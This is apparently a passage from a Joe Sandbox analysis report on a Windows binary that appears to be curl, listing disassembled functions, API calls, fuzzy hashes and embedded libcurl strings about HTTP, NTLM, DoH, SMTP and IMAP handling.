                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$_strdup
                                        • String ID: Got more output options than URLs$out of memory
                                        • API String ID: 2653869212-1666425204
                                        • Opcode ID: bbb0957de0dd577f4f2152649a2288975f1afa084fa3246a88a8a6050c704d9a
                                        • Instruction ID: a3404eba8e59950ea475e32cc3a20ff47acb6476f71be5d7962fb3aa74d73f93
                                        • Opcode Fuzzy Hash: bbb0957de0dd577f4f2152649a2288975f1afa084fa3246a88a8a6050c704d9a
                                        • Instruction Fuzzy Hash: 90316E726047459FDB159F24D889FDC7BF1BB44325F2840BEE8099F292DB749881CB50
                                        APIs
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,74F81980,?,000E1D52,?,?,?,?,000C8B8E), ref: 000E1AF5
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,000E1D52,?,?,?,?,000C8B8E), ref: 000E1B03
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,000E1D52,?,?,?,?,000C8B8E), ref: 000E1B11
                                          • Part of subcall function 000E7EC3: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E8849,00000000,?,?,?,000D2373,?,?,?,?,000C16C6,?,00200030), ref: 000E7F33
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: __acrt_iob_func$free
                                        • String ID: <$`$v
                                        • API String ID: 1664282339-4007386528
                                        • Opcode ID: 928f17569a852a3d83e994706217273556e407edd147e67d6d61a8de564fe229
                                        • Instruction ID: 76ab3cfe6a9ce22d7c433990b5a44fa9f41e95e49e522d168643aeb2151c363c
                                        • Opcode Fuzzy Hash: 928f17569a852a3d83e994706217273556e407edd147e67d6d61a8de564fe229
                                        • Instruction Fuzzy Hash: 4D51C0B0909780CAEB55CF29D8C87C53BA1AF99704F1841BAED4C8F29BD7B91184CF65
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000), ref: 000E681E
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00117A20,?,?,00000000), ref: 000E6848
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E686D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6887
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000E688F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E68E3
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000E68E7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$fclose$fopenmalloc
                                        • String ID:
                                        • API String ID: 2597608617-0
                                        • Opcode ID: 87f59cd5086f51ea6791c30844e67b27b8aa83cedf12c3ded530d0aa92636c10
                                        • Instruction ID: f99375ddb116e65e89d0410ba82e1761658c7f05b2ddd94eb5bad97a63a3c5ef
                                        • Opcode Fuzzy Hash: 87f59cd5086f51ea6791c30844e67b27b8aa83cedf12c3ded530d0aa92636c10
                                        • Instruction Fuzzy Hash: 5B218636610512DFDB2C1F24FD182BE3BE6EF947A0B24803BE850A77A2CFA05C424690
                                        APIs
                                        • _fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 000C9282
                                          • Part of subcall function 000CF352: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?), ref: 000CF58A
                                        • _close.API-MS-WIN-CRT-STDIO-L1-1-0(000000FF), ref: 000C930A
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C9311
                                        • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C9319
                                          • Part of subcall function 000D0B16: _open.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100,00000180,?,000C2077,?,00008501,00000180), ref: 000D0B2D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: __acrt_iob_func_close_fileno_fstat64_openfree
                                        • String ID: CURLOPT_INFILESIZE_LARGE$Can't open '%s'!
                                        • API String ID: 440421868-219864042
                                        • Opcode ID: c5a4b7e09966dfc4f2d5d4ed529d2d26afd5f6228f34f24687aeb15d1f028dac
                                        • Instruction ID: d16cd1b3f579a85b65c2151719cce0ed427586a0b57d9cf01943028a9015919c
                                        • Opcode Fuzzy Hash: c5a4b7e09966dfc4f2d5d4ed529d2d26afd5f6228f34f24687aeb15d1f028dac
                                        • Instruction Fuzzy Hash: A421F332601704AFDB289BA8DD4AFEEB7E5EF48320F10052DF456925D1EB71BC418B14
                                        APIs
                                        • getpeername.WS2_32(?,?,?), ref: 000DE4E6
                                        • WSAGetLastError.WS2_32 ref: 000DE4F0
                                          • Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA0C3
                                          • Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0CB
                                          • Part of subcall function 000DA0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0DD
                                          • Part of subcall function 000DA0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 000DA0EC
                                          • Part of subcall function 000DA0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 000DA0F6
                                          • Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA142
                                          • Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA15C
                                          • Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA173
                                          • Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA180
                                          • Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA188
                                          • Part of subcall function 000DA0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA193
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DE535
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DE53D
                                        Strings
                                        • getpeername() failed with errno %d: %s, xrefs: 000DE509
                                        • ssrem inet_ntop() failed with errno %d: %s, xrefs: 000DE557
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _errno$ErrorLast$_strrchr$__sys_errlist__sys_nerrgetpeernamestrncpy
                                        • String ID: getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                        • API String ID: 1744225859-4047410615
                                        • Opcode ID: ff7f04a926c47e6fec17a4b2967518a0c29ef75f2eaa5223f82117d826925ada
                                        • Instruction ID: 02c260dd403b7c84ee421bff6e365886ee1f9ad48d71481ac9df21855b3d3fed
                                        • Opcode Fuzzy Hash: ff7f04a926c47e6fec17a4b2967518a0c29ef75f2eaa5223f82117d826925ada
                                        • Instruction Fuzzy Hash: 6D218472900218AFDB14AB64EC45EEA77BDEB49350F0041ABF909D7241EB705E888FF0
                                        APIs
                                        • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,?,001125F8,?,?,0012F464,00000000,?,00112723,00000004,InitializeCriticalSectionEx,0011627C,InitializeCriticalSectionEx,00000000), ref: 001125C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID: api-ms-
                                        • API String ID: 3664257935-2084034818
                                        • Opcode ID: 1e3ec2ee3845ec6677622df3fecae7310d6f785a8b874dcc42f651fd085eafdf
                                        • Instruction ID: 1d06216fc67716dea93322e6ac50529dd5103067d791d563b4c15ded9b363cf3
                                        • Opcode Fuzzy Hash: 1e3ec2ee3845ec6677622df3fecae7310d6f785a8b874dcc42f651fd085eafdf
                                        • Instruction Fuzzy Hash: 7411A331A01620BBDB6B4B689C91BD937A6AF41760F554230F901E72C0D770ED908AD1
                                        APIs
                                        • SearchPathA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-2-0(00000000,curl-ca-bundle.crt,00000000,00000104,?,?), ref: 000C30AB
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C30BD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 000C30CA
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 000C30DD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 000C30E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _strdupfree$PathSearch
                                        • String ID: curl-ca-bundle.crt
                                        • API String ID: 4109318298-694051528
                                        • Opcode ID: cb058a6141803f8461b449fe4df1471544514bf472367a3ff9cdd2f197dfda77
                                        • Instruction ID: 4153bb347959e777425f04012c1677d169bdfb88c612867add660208912b776c
                                        • Opcode Fuzzy Hash: cb058a6141803f8461b449fe4df1471544514bf472367a3ff9cdd2f197dfda77
                                        • Instruction Fuzzy Hash: 3A11CE72504708EFDB259FA4EC85FDEB7E8EB89714F1041AEE48193641DBB0AA858A10
                                        APIs
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,000C900B), ref: 000C8E64
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,000C900B), ref: 000C8E7F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,error initializing curl library,?,000C900B), ref: 000C8ECE
                                        Strings
                                        • error initializing curl library, xrefs: 000C8EC0
                                        • error initializing curl, xrefs: 000C8ED9
                                        • error retrieving curl library information, xrefs: 000C8EB9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: __acrt_iob_funcfreemalloc
                                        • String ID: error initializing curl$error initializing curl library$error retrieving curl library information
                                        • API String ID: 2771806388-2118345949
                                        • Opcode ID: cac71f0ec9af853df0ccd3b6400b8542cabffa17b71388bacc720cb0134577a0
                                        • Instruction ID: ea0f56f67cf45012c60c21b16098cd2ab9f8d2d832f413fc146c8149ab325390
                                        • Opcode Fuzzy Hash: cac71f0ec9af853df0ccd3b6400b8542cabffa17b71388bacc720cb0134577a0
                                        • Instruction Fuzzy Hash: AF01F975504B01DFD365AB54D909F9FB7F1FF84360B14842EF48697A92DFB0A8808715
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,74F83C50,00000000,000E17E1,000C8BF9), ref: 000E15DF
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E15FE
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E161B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1638
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1655
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1672
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E168F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E16AC
                                          • Part of subcall function 000D5D80: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D5D9B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: c7bd2a417ccccd329270deb276a26e4152c3403f352a27d84b98be6f7fe3966e
                                        • Instruction ID: 979600815de8f6d2740f22e78a356c616b21ca140e482f68b5354240cb943a04
                                        • Opcode Fuzzy Hash: c7bd2a417ccccd329270deb276a26e4152c3403f352a27d84b98be6f7fe3966e
                                        • Instruction Fuzzy Hash: C2219531624926EFE70C5F34EC4899CFBA6FB48311F10822FE42993661CFB428619F95
                                        APIs
                                          • Part of subcall function 0010ADF2: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,HTTP,?,?), ref: 0010AE0A
                                          • Part of subcall function 0010ADF2: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010AE21
                                          • Part of subcall function 0010ADF2: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 0010AE3D
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000A,?,?,?,?,?,?,?,?,?,?,?,0010B2F1,?), ref: 0010FBFD
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000A,?,?,?,?,?,?,?,?,?,?,?,0010B2F1,?), ref: 0010FC53
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,0010B2F1,?,?,?,00000000), ref: 0010FCA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: callocfree$_strdupmalloc
                                        • String ID: GSSAPI handshake failure (empty challenge message)$Kerberos$SSPI: couldn't get auth info
                                        • API String ID: 3060414022-4232989830
                                        • Opcode ID: 5c365c5c5e4ef6b50be41dfb12f4ceafe46dbef9b67e10b0952a40daef3b5e1c
                                        • Instruction ID: 3e5371935f5b6b716e55dd52d658afed0fdc22411ab421547e2f03c3c789ab95
                                        • Opcode Fuzzy Hash: 5c365c5c5e4ef6b50be41dfb12f4ceafe46dbef9b67e10b0952a40daef3b5e1c
                                        • Instruction Fuzzy Hash: B7916171A00619AFDB24CF54D955AAEBBF5FF08310F14812EE845E7A90D7B0AD42CB91
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EBEFF
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EBF35
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC00C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC161
                                          • Part of subcall function 000DA7F6: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000), ref: 000DA80D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: No URL set$User-Agent: %s
                                        • API String ID: 1294909896-339178133
                                        • Opcode ID: de3a9bc7c1ec24318abb4c2be0d88bc6b8444b5bcc0e067ab34e98587ad420de
                                        • Instruction ID: 048ed13ed372395f9b152f30a7eafbba292cd99de8ab660ec81943402fcf2c48
                                        • Opcode Fuzzy Hash: de3a9bc7c1ec24318abb4c2be0d88bc6b8444b5bcc0e067ab34e98587ad420de
                                        • Instruction Fuzzy Hash: AC917A35604281CFEF598F69D8C0BE63BA1AF45310F2841BADC599F28BDB715942CB71
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: AAAA$Could not DoH-resolve: %s$DoH Host name: %s$DoH: %s type %s for %s$bad error code
                                        • API String ID: 0-4260076447
                                        • Opcode ID: a23c48085003837b79c0e1f419b87e863ce53f3477a7f879e6d4ed8b5001d0f8
                                        • Instruction ID: 93c635c451fd08e8d0393b929d40edc325870d8c5e10f986adbf765dcae0bc84
                                        • Opcode Fuzzy Hash: a23c48085003837b79c0e1f419b87e863ce53f3477a7f879e6d4ed8b5001d0f8
                                        • Instruction Fuzzy Hash: B8719371A013159FDB29DF24DCA9BA9B3B5EF44310F1041AEE449AB2D2DBB46E81CF50
                                        APIs
                                          • Part of subcall function 000D5DA0: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,000E33F9), ref: 000D5DB7
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F1FCD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: callocfree
                                        • String ID: ;type=$;type=%c$?%s$ftp$http
                                        • API String ID: 306872129-3547414
                                        • Opcode ID: c83f0074307339090513d8df9a215347a0813f7e033dd3699b7d2d3b0e107555
                                        • Instruction ID: 1299f2ce26a34b865c5c09c7996113e7263ab26ab40daa17383411df17209182
                                        • Opcode Fuzzy Hash: c83f0074307339090513d8df9a215347a0813f7e033dd3699b7d2d3b0e107555
                                        • Instruction Fuzzy Hash: B6412832704709ABEB799625D855FBB2BE68FC5760F14403BE9089BAC3EF20DC51D264
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F6136
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: SMTPUTF8$%s %s%s$EXPN$HELP$VRFY %s%s%s%s
                                        • API String ID: 1294909896-2300960079
                                        • Opcode ID: 2087b646c7dfa8ec613a7ad60962e36b0f590ad46cea5aefc910c384288aea18
                                        • Instruction ID: 48f71221da6f948801c2f33ef059d7f19e692c44c073ff061e70d8fdd9e8254e
                                        • Opcode Fuzzy Hash: 2087b646c7dfa8ec613a7ad60962e36b0f590ad46cea5aefc910c384288aea18
                                        • Instruction Fuzzy Hash: C0413670B0412A9BEB14CA588D40ABF77E9EF56310F2C81B9EE41D7742DB62DD41A790
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000009B8,?,?,000F0F95,?,?,00000000,?), ref: 00100C78
                                        Strings
                                        • NTLM handshake rejected, xrefs: 00100CF3
                                        • NTLM handshake failure (internal error), xrefs: 00100D1C
                                        • NTLM handshake failure (empty type-2 message), xrefs: 00100C52
                                        • NTLM, xrefs: 00100BD1
                                        • NTLM auth restarted, xrefs: 00100C10
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID: NTLM$NTLM auth restarted$NTLM handshake failure (empty type-2 message)$NTLM handshake failure (internal error)$NTLM handshake rejected
                                        • API String ID: 2803490479-2228421627
                                        • Opcode ID: 3386bf01cd9e34d3f8a46040bd3ed34fea1aba88873c1ecf909bf43bdf335524
                                        • Instruction ID: 1b941945890a4f56f4ca0d38d0c671b9a36379d884b600c86aa93b30c931d979
                                        • Opcode Fuzzy Hash: 3386bf01cd9e34d3f8a46040bd3ed34fea1aba88873c1ecf909bf43bdf335524
                                        • Instruction Fuzzy Hash: 9941FC71A04306AFEB16DF58D991BAD77E4AF1C310F2044AAE445A72C2EBB19D44CB50
                                        Strings
                                        • APPEND %s (\Seen) {%I64d}, xrefs: 0010180B
                                        • Mime-Version, xrefs: 0010175A
                                        • Mime-Version: 1.0, xrefs: 00101771
                                        • Cannot APPEND without a mailbox., xrefs: 00101701
                                        • Cannot APPEND with unknown input file size, xrefs: 001017CF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: APPEND %s (\Seen) {%I64d}$Cannot APPEND with unknown input file size$Cannot APPEND without a mailbox.$Mime-Version$Mime-Version: 1.0
                                        • API String ID: 0-3307439731
                                        • Opcode ID: 5699ab1decc82f64b1053d5e87db5b6d116aae688e15756d9d2104b6095c7683
                                        • Instruction ID: 0ae8a5535ec41742c0fd228c52de8df0c5a3e8c5c594808cc13f9b2374bb7491
                                        • Opcode Fuzzy Hash: 5699ab1decc82f64b1053d5e87db5b6d116aae688e15756d9d2104b6095c7683
                                        • Instruction Fuzzy Hash: 5E314631304B02BBEB1C5B249896BBAB391BB84710F10422EF4599B2C1DFB86811CBD5
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?), ref: 000F05B5
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?), ref: 000F05F1
